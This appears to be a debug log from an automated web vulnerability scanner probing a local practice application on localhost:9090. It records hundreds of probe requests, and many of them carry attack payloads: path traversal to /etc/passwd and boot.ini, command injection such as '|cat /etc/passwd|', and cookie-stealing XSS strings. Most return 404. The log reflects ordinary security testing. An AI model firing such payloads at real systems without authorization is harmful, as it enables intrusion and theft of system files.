find_dvcs.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=w0Vrcscp) [Wed Feb 12 10:04:27 2020 - debug] [find_dvcs] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4406. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini returned HTTP code "404" (id=22984,from_cache=0,grep=1,rtt=0.08,did=ff39WRKk) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4407. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/MachineInfo returned HTTP code "404" (id=22994,from_cache=0,grep=1,rtt=0.03,did=y0WU1wIz) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4408. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/opendir.php?/etc/passwd= returned HTTP code "404" (id=22993,from_cache=0,grep=1,rtt=0.04,did=n3T1UARd) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/ss000007.pl?PRODREF= returned HTTP code "404" (id=22996,from_cache=0,grep=1,rtt=0.11,did=5F8beGkQ) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4409. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/a?= returned HTTP code "404" (id=22995,from_cache=0,grep=1,rtt=0.10,did=b5TC2MvL) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password\x00 returned HTTP code "404" (id=22900,from_cache=0,grep=1,rtt=0.11,did=PpdS5h74) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/csNewsPro.cgi?command=savesetup&setup=&system(\'cat /etc/passwd\')= returned HTTP code "404" (id=22998,from_cache=0,grep=1,rtt=0.03,did=ncajuefH) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4410. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/dumpenv.pl returned HTTP code "404" (id=22997,from_cache=0,grep=1,rtt=0.10,did=Reu88xrm) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4411. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2128. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/servlet/org.apache.catalina.Context/ returned HTTP code "404" (id=22999,from_cache=0,grep=1,rtt=0.12,did=BoCFZN4p) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4412. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4413. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/soinfo.php?\\">= returned HTTP code "404" (id=23002,from_cache=0,grep=1,rtt=0.23,did=UY6VnCq4) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/ssi/envout.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\= returned HTTP code "404" (id=23001,from_cache=0,grep=1,rtt=0.10,did=EM7R74PO) [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:111 / in_use:6 / max:50 / total:117) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (b1a7b13ec8d8daaf, 0.10 sec) (f68474ff126c8504, 0.10 sec) (6b4979a0efadf95a, 0.06 sec) (6bfd72a4a3ceaa0d, 0.03 sec) (c7d70abe6fde8caa, 0.02 sec) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4414. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0 returned HTTP code "404" (id=23003,from_cache=0,grep=1,rtt=0.04,did=UKpGJVir) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/\x00 returned HTTP code "404" (id=23008,from_cache=0,grep=1,rtt=0.07,did=NGL2qmDj) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/wx/s.dll?d=/boot.ini returned HTTP code "404" (id=23007,from_cache=0,grep=1,rtt=0.06,did=P8FyH7ra) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/mt/mt.cfg returned HTTP code "404" (id=23004,from_cache=0,grep=1,rtt=0.07,did=nLHbA9v4) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=23005,from_cache=0,grep=1,rtt=0.11,did=INSCeu15) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/search/?SectionIDOverride=1&SearchText== returned HTTP code "404" (id=23009,from_cache=0,grep=1,rtt=0.02,did=wyV84PGc) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\"> returned HTTP code "404" (id=23006,from_cache=0,grep=1,rtt=0.11,did=skkZoxRs) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2129. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/ws_ftp.ini returned HTTP code "404" (id=23000,from_cache=0,grep=1,rtt=0.10,did=SdjsE1IW) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/myhome.php?action=messages&box= returned HTTP code "404" (id=23010,from_cache=0,grep=1,rtt=0.12,did=Myohx7bc) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4415. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090//index.html returned HTTP code "404" (id=23014,from_cache=0,grep=1,rtt=0.20,did=4opxfh6f) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~sys returned HTTP code "404" (id=23012,from_cache=0,grep=1,rtt=0.12,did=Ex0mAEPZ) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/perl?-v= returned HTTP code "404" (id=23013,from_cache=0,grep=1,rtt=0.13,did=Q4KVrFd2) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2130. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=23011,from_cache=0,grep=0,rtt=0.08,did=sejgaLc3) [Wed Feb 12 10:04:27 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: sejgaLc3) [Wed Feb 12 10:04:27 2020 - debug] detailed._login() took 0.54s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4416. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2131. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2132. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4416. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4416. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/examples/jsp/snp/anything.snp returned HTTP code "404" (id=23015,from_cache=0,grep=1,rtt=0.05,did=ZoymIu2V) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/pages/htmlos/ returned HTTP code "404" (id=23021,from_cache=0,grep=1,rtt=0.06,did=faegHPxi) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid= returned HTTP code "404" (id=23022,from_cache=0,grep=1,rtt=0.12,did=RZmbRbRD) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cbms/realinv.php returned HTTP code "404" (id=23023,from_cache=0,grep=1,rtt=0.21,did=7zj0awws) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cfdocs/expeval/sendmail.cfm returned HTTP code "404" (id=23020,from_cache=0,grep=1,rtt=0.12,did=S5cUptfO) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/imp/horde/test.php returned HTTP code "404" (id=23017,from_cache=0,grep=1,rtt=0.09,did=C4DnklJC) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/..\\..\\..\\..\\..\\..\\temp\\temp.class returned HTTP code "404" (id=23019,from_cache=0,grep=1,rtt=0.15,did=WyMyF5H7) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/calendar/calendar_admin.pl?config=|cat /etc/passwd| returned HTTP code "404" (id=23018,from_cache=0,grep=1,rtt=0.02,did=ScpPY3IQ) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/TopSitesdirectory/help.php?sid=<=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=23016,from_cache=0,grep=1,rtt=0.12,did=Y5FLKvaT) [Wed Feb 12 10:04:27 2020 - debug] symfony.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2133. [Wed Feb 12 10:04:27 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] private_ip.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] motw.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_generator.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] retirejs.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] expect_ct.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:27 2020 - debug] serialized_object.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] blank_body.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] credit_cards.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] websockets_links.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] svn_users.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dom_xss.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] keys.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] file_upload.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] clamav.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] vulners_db.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] csp.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/calendar.php?year==&month=03&day=05 returned HTTP code "404" (id=23024,from_cache=0,grep=1,rtt=0.22,did=Qw7DuYqy) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4417. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/forums/browse.php?fid=3&tid=46&go== returned HTTP code "404" (id=23026,from_cache=0,grep=1,rtt=0.11,did=8CRF6YhV) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/chat/!nicks.txt returned HTTP code "404" (id=23027,from_cache=0,grep=1,rtt=0.20,did=bOYQH26Z) [Wed Feb 12 10:04:27 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] objects.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] error_500.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_tags.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] password_profiling.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] click_jacking.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] lang.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2134. [Wed Feb 12 10:04:27 2020 - debug] url_session.grep(uri="http://localhost:9090/30/") took 0.05s to run [Wed Feb 12 10:04:27 2020 - debug] strange_reason.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] cache_control.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_headers.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] ssn.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] oracle.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] feeds.grep(uri="http://localhost:9090/30/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/default.php?error_message== returned HTTP code "404" (id=23025,from_cache=0,grep=1,rtt=0.12,did=nyJr6dkj) [Wed Feb 12 10:04:27 2020 - debug] error_pages.grep(uri="http://localhost:9090/30/") took 0.04s to run [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/viralator.cgi returned HTTP code "404" (id=23031,from_cache=0,grep=1,rtt=0.06,did=5DXQySyb) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~mysql returned HTTP code "404" (id=23032,from_cache=0,grep=1,rtt=0.05,did=wv9qJ3SE) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/htsearch?-c/nonexistant= returned HTTP code "404" (id=23033,from_cache=0,grep=1,rtt=0.01,did=Zx82Mmww) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/_mem_bin/formslogin.asp?\\">= returned HTTP code "404" (id=23029,from_cache=0,grep=1,rtt=0.06,did=TUuwIEIU) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\\"> returned HTTP code "404" (id=23028,from_cache=0,grep=1,rtt=0.08,did=8paiQnu9) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/[SecCheck]/..%2f..%2f../ext.ini returned HTTP code "404" (id=23030,from_cache=0,grep=1,rtt=0.07,did=3ah1ysTv) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4418. [Wed Feb 12 10:04:27 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/30/") took 0.12s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4419. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cbms/usersetup.php returned HTTP code "404" (id=23038,from_cache=0,grep=1,rtt=0.02,did=0nmEUEo6) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2135. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l= returned HTTP code "404" (id=23034,from_cache=0,grep=1,rtt=0.18,did=r3f5eexV) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php/content/search/?SectionID=3&SearchText= returned HTTP code "404" (id=23036,from_cache=0,grep=1,rtt=0.13,did=wIIdHAsr) [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:118 / in_use:2 / max:50 / total:120) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (ab7a9f0e1e13e724, 0.01 sec) (f94e6aed98bfd5af, 0.00 sec) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/mailman/listinfo/ returned HTTP code "404" (id=23037,from_cache=0,grep=1,rtt=0.15,did=LbjeUpst) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4420. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2136. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/showcat.php?catid=<=<=&Script=>=>=&JavaScript:alert(\'Vulnerable\')=&/Script= returned HTTP code "404" (id=23035,from_cache=0,grep=1,rtt=0.02,did=BV8kBtr1) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4421. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/chat/!pwds.txt returned HTTP code "404" (id=23039,from_cache=0,grep=1,rtt=0.01,did=jfA9Hkb8) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2137. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/perl.exe?-v= returned HTTP code "404" (id=23040,from_cache=0,grep=1,rtt=0.04,did=JuaWglbS) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4422. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/echo.bat returned HTTP code "404" (id=23044,from_cache=0,grep=1,rtt=0.07,did=PjFKeBMG) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2138. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4423. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2139. [Wed Feb 12 10:04:27 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/learn/vulnerability/a7_xss returned HTTP code "200" (id=23041,from_cache=0,grep=1,rtt=2.39,did=L56RYYxY) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/mkilog.exe returned HTTP code "404" (id=23043,from_cache=0,grep=1,rtt=0.02,did=P3zmKoES) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/query?mss=../config returned HTTP code "404" (id=23045,from_cache=0,grep=1,rtt=0.06,did=37FgZ98h) [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:104 / in_use:15 / max:50 / total:119) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (38ae77659c2b85db, 0.16 sec) (6bfd72a4a3ceaa0d, 0.16 sec) (c7d70abe6fde8caa, 0.14 sec) (6941a0a978ef0bd6, 0.13 sec) (f36b7eb25ce6fa7d, 0.12 sec) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=News&file=index&catid=&topic=>= returned HTTP code "404" (id=23047,from_cache=0,grep=1,rtt=0.05,did=F7WYhOjm) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4424. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/fom.cgi?file= returned HTTP code "404" (id=23042,from_cache=0,grep=1,rtt=0.05,did=7UOLQM08) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/simple/view_page?mv_arg=|cat /etc/passwd| returned HTTP code "404" (id=23046,from_cache=0,grep=1,rtt=0.04,did=8rnu86zR) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif returned HTTP code "404" (id=23048,from_cache=0,grep=1,rtt=0.13,did=sOkoUasw) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2140. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/search.php?zoom_query= returned HTTP code "404" (id=23050,from_cache=0,grep=1,rtt=0.07,did=sCv9tn09) [Wed Feb 12 10:04:27 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4425. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/whois_raw.cgi?fqdn=\ncat /etc/passwd returned HTTP code "404" (id=23051,from_cache=0,grep=1,rtt=0.18,did=0PBoQ8ed) [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11797, 'reject-seen-url': 5587, 'reject-out-of-scope': 216, 'accept': 4825} [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/file-that-is-not-real-2002.php3 returned HTTP code "404" (id=23052,from_cache=0,grep=1,rtt=0.17,did=aDQ6MII2) [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11797, 'reject-seen-url': 5587, 'reject-out-of-scope': 216, 'accept': 4825} [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/webdist.cgi returned HTTP code "404" (id=23053,from_cache=0,grep=1,rtt=0.13,did=6KmvaHjc) [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11797, 'reject-seen-url': 5587, 'reject-out-of-scope': 216, 'accept': 4825} [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2141. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/admin/admin.cgi returned HTTP code "404" (id=23049,from_cache=0,grep=1,rtt=0.13,did=HNrDNgbg) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/bigconf.cgi returned HTTP code "404" (id=23054,from_cache=0,grep=1,rtt=0.16,did=rldzmDzo) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=WebChat&file=index&roomid= returned HTTP code "404" (id=23059,from_cache=0,grep=1,rtt=0.06,did=t34B0Sfn) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/phpinfo.php?VARIABLE= returned HTTP code "404" (id=23056,from_cache=0,grep=1,rtt=0.13,did=MCtytAdp) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4426. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\\">&MMN_position=[X:X] returned HTTP code "404" (id=23055,from_cache=0,grep=1,rtt=0.20,did=GRQRjbQ3) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/comments/browse.php?fid=2&tid=4&go=<=<=&script=>=>=&alert(\'Vulnerable\')=&/script= returned HTTP code "404" (id=23057,from_cache=0,grep=1,rtt=0.06,did=Soxk9oUF) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4427. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4427. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4427. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/virgil.cgi returned HTTP code "404" (id=23058,from_cache=0,grep=1,rtt=0.11,did=bao1jU2E) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4428. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4429. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high 